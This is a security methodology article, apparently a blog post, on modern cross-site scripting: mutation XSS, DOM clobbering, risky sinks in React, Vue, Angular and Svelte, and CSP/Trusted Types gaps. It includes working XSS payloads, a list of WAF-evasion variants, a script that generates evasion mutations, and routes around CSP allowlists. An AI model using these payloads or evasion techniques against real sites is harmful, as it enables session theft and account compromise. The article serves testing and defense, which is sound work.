METHODOLOGY 12 DEC 2025 · 12 min read

XSS Reborn

Modern mutation vectors, framework-specific sinks, and WAF evasion in 2026.

Cross-site scripting was supposed to be a solved problem by now. Frameworks escape by default. Browsers ship Trusted Types. Content Security Policies are everywhere. And yet, every week, somebody pops a top-100 web app with a payload that fits in a tweet.

Why XSS didn't die

Three reasons, roughly equally weighted:

  1. Frameworks escape by default — but every framework has an escape hatch. dangerouslySetInnerHTML, v-html, [innerHTML], {@html}. Each one is a JIRA ticket waiting to be filed.
  2. The DOM is enormous. Browsers parse, sanitize, mutate, and re-serialize content through dozens of code paths. Mutation XSS exploits the disagreement between sanitization-time HTML and post-insertion HTML.
  3. Defense relies on configuration. CSPs are written by humans. So are sanitizer allowlists. So are URL validation regexes. There is always a hole.

Mutation XSS, briefly

The classic mXSS pattern: a sanitizer accepts a payload because it parses as harmless HTML, then the payload is inserted into a context where the browser re-parses it differently and produces a script-execution context.

<listing><img src=x onerror=alert(1)></listing>

Some sanitizers treat the <listing> wrapper as a content-only element and let the inner string through unchanged as a text node. When the browser serializes the resulting DOM via innerHTML and re-parses it, the inner content is treated as live HTML: the onerror handler is registered, and the image fails to load on cue. Sanitizer bypass via parser disagreement — exactly the same family of bug as our TeamCity friend, just in a browser instead of a router.
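
The round trip can be sketched without a browser. A minimal Node simulation — naiveSanitize and reserialize are hypothetical stand-ins for a real sanitizer and the browser's innerHTML cycle; the point is the disagreement between the two parses, not exact engine behavior:

```javascript
// Conceptual mXSS simulation. The payload inside <listing> is
// entity-encoded, so a tag-matching sanitizer sees only text.
function naiveSanitize(html) {
  // Strips nothing: no literal <script> or <img> tag is visible.
  return /<(script|img)\b/i.test(html) ? '' : html;
}

function reserialize(html) {
  // Models the browser decoding entities on the parse/serialize cycle.
  return html.replace(/&lt;/g, '<').replace(/&gt;/g, '>');
}

const payload = '<listing>&lt;img src=x onerror=alert(1)&gt;</listing>';
const sanitized = naiveSanitize(payload);  // unchanged: looks inert
const mutated = reserialize(sanitized);    // now contains a live <img> tag
```

The sanitizer's verdict ("harmless text") and the browser's second parse ("live element") disagree, and the attacker lives in the gap.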

SVG namespaces, noscript in different parser modes, template elements, and the <noembed> tag all have similar histories. If you write a sanitizer, you are signing up to chase the HTML spec for the rest of your career.

DOM clobbering revisited

Pure HTML — no script tag — can override JavaScript globals via id and name attributes. If application code does:

if (window.config) { ... }
else { /* secure default */ }

An attacker who can inject <a id=config href="javascript:alert(1)"> makes window.config a truthy element reference, so the conditional takes the configured branch instead of the secure default — with a value that stringifies to the attacker's URL. Real-world impact has included CSP bypasses, sanitizer bypasses, and authentication-flow tampering.
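
The clobbering semantics can be stubbed in plain JS. A sketch — windowLike stands in for the real window; in a browser, the named anchor element itself becomes the global:

```javascript
// Simulation of DOM clobbering. In a real browser, an injected
// <a id=config href="javascript:alert(1)"> makes window.config refer to
// the anchor element, which is truthy and stringifies to its href.
const clobberedConfig = {
  toString() { return 'javascript:alert(1)'; },  // HTMLAnchorElement → href
};
const windowLike = { config: clobberedConfig };  // window after injection

let branch;
if (windowLike.config) {
  branch = 'configured';     // runs on attacker-controlled data
} else {
  branch = 'secure-default'; // the path the developer expected
}
```

Any code that later coerces the "config" to a string — say, into a redirect target — receives the javascript: URL.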

The 2024-2026 wave of clobbering research extended this into prototype pollution territory. Worth reading current papers if you take this seriously.

Framework-specific sinks

React

<div dangerouslySetInnerHTML={{__html: userInput}} />
<a href={userInput}>...</a>     // javascript: URLs still work
React.createElement(userInput, ...)  // tag name injection
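
The javascript: sink in the middle line is the easiest to close: allowlist URL schemes before the value ever reaches href. A sketch — safeHref is a hypothetical helper, not a React API, and the base URL is only there so relative paths parse:

```javascript
// Allowlist URL schemes before user input reaches an href attribute.
function safeHref(input) {
  try {
    const url = new URL(input, 'https://example.com/');
    return ['http:', 'https:', 'mailto:'].includes(url.protocol)
      ? url.href
      : '#';
  } catch {
    return '#';  // unparseable input falls back to an inert fragment
  }
}
```

In JSX this becomes <a href={safeHref(userInput)}>. Parsing with the URL constructor rather than a regex sidesteps the classic bypasses (mixed case, embedded whitespace, entity-encoded scheme characters).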

Vue

<div v-html="userInput"></div>
{{ userInput }}              // safe in 3.x — but compile-time
                             // template injection on the server
                             // is its own catastrophe.

Angular

Angular's template language is a programming language. If user input ever reaches the template compiler — even reflected through a CMS field — you get full sandboxed JS execution, and the sandbox has historically been escapable.

Svelte

{@html ...} does no escaping. Svelte's reactivity model means the sink can fire on a state change far removed from the original input.

WAF evasion that still works

WAFs match against signatures. Signatures are regexes. Regexes lose to creativity:

# Case mixing
<ScRiPt>alert(1)</ScRiPt>

# HTML entity encoding inside attributes
<a href="java&#115;cript:alert(1)">

# Whitespace alternatives
<img src=x onerror=alert(1)>
<img/src=x/onerror=alert(1)>
<img	src=x	onerror=alert(1)>

# No parens — template-literal invocation, old but charming
<svg onload=alert`1`>

# Event handlers nobody filters
<details ontoggle=alert(1) open>
<video src=x onerror=alert(1)>
<style onload=alert(1)>...

The reliable WAF bypass methodology: take the canonical payload, mutate one axis at a time (case → encoding → whitespace → element → event), and see what slips through. The first request that hits the application unmodified is your starting point. Refine from there.
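
The axis-by-axis loop is easy to mechanize. A minimal sketch — the axis list is illustrative, not exhaustive; feed each variant to the target and diff what arrives unmodified:

```javascript
// One mutation per axis, applied to a canonical payload.
function caseMix(s) {
  let i = 0;
  return s.replace(/[a-z]/gi, c =>
    i++ % 2 ? c.toLowerCase() : c.toUpperCase());
}

const img = '<img src=x onerror=alert(1)>';
const variants = [
  caseMix(img),                   // case axis
  img.replace(/ /g, '/'),         // whitespace axis: slashes
  img.replace(/ /g, '\t'),        // whitespace axis: tabs
  img.replace('img', 'video'),    // element axis (swap tag, keep event)
];

// Entity axis only decodes inside attribute values, so it pairs with
// a javascript: href rather than an event handler:
const entity = '<a href="javascript:alert(1)">'.replace('s', '&#115;');
```

Each variant changes exactly one thing, so the first one that reaches the application unmodified tells you which signature axis the WAF is missing.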

Trusted Types, CSP, and where they leak

Trusted Types, when properly enforced (require-trusted-types-for 'script'), genuinely make most DOM XSS dead on arrival. CSPs with strict script-src values and no unsafe-inline close most reflected XSS.

Where they fail in practice:

  • Allowlisted CDNs hosting AngularJS, jQuery, etc. If cdnjs.cloudflare.com is in your script-src, an attacker with HTML injection can include a vulnerable older library and use it as a jump pad.
  • JSONP endpoints on allowlisted domains. One callback parameter, one bypass.
  • Strict-dynamic with a forgotten nonce in source HTML. If an attacker can read or guess a nonce, the entire policy unravels.
  • Trusted Types policies that pass input through. A policy named default that returns its input unchanged is the same as no policy at all.
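
The last bullet is worth seeing in code. trustedTypes is a browser API, so the stub below stands in for it just enough to show the anti-pattern's shape in plain Node — real enforcement happens in the browser:

```javascript
// Minimal stub of trustedTypes.createPolicy (browser API).
const trustedTypes = {
  createPolicy: (name, rules) => ({ name, ...rules }),
};

// Anti-pattern: a default policy that echoes its input. Under
// require-trusted-types-for 'script' this satisfies enforcement
// while sanitizing nothing.
const bad = trustedTypes.createPolicy('default', {
  createHTML: input => input,
});

const payload = '<img src=x onerror=alert(1)>';
const out = bad.createHTML(payload);  // identical to the payload
```

A real createHTML callback is supposed to sanitize or reject; an identity function launders any string into a TrustedHTML value, which is strictly worse than no Trusted Types at all, because the policy reads as a defense in code review.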

The actual takeaway

XSS in 2026 is rarely a missing escape on user input. It's a sanitizer disagreement, a framework escape hatch, a misconfigured policy, or a clobbered global. The hunters who keep finding it have stopped looking for raw <script> tags and started reading the parser specs.

Be one of those hunters. Or, if you're building, treat every escape hatch as a security decision and document accordingly. The bug class is not done with us.